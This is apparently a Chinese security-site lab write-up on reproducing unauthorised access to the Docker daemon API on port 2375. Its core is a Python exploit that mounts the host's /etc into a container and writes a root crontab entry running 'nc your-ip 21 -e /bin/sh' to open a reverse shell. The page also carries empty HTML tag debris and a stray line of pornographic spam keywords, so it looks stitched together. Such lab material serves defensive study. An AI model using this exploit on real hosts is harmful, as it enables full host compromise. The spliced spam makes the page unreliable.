<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    docker daemon api 未授權訪問漏洞

    Path docker/unauthorized-rce

    參考鏈接:

    漏洞環境

    編譯及啟動漏洞環境:

    docker-compose build
    docker-compose up -d
    

    環境啟動后,將監聽2375端口。

    漏洞復現

    利用方法是,我們隨意啟動一個容器,并將宿主機的/etc目錄掛載到容器中,便可以任意讀寫文件了。我們可以將命令寫入crontab配置文件,進行反彈shell。

    import docker
    
    client = docker.DockerClient(base_url='http://your-ip:2375/')
    data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

    寫入crontab文件,成功反彈shell:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类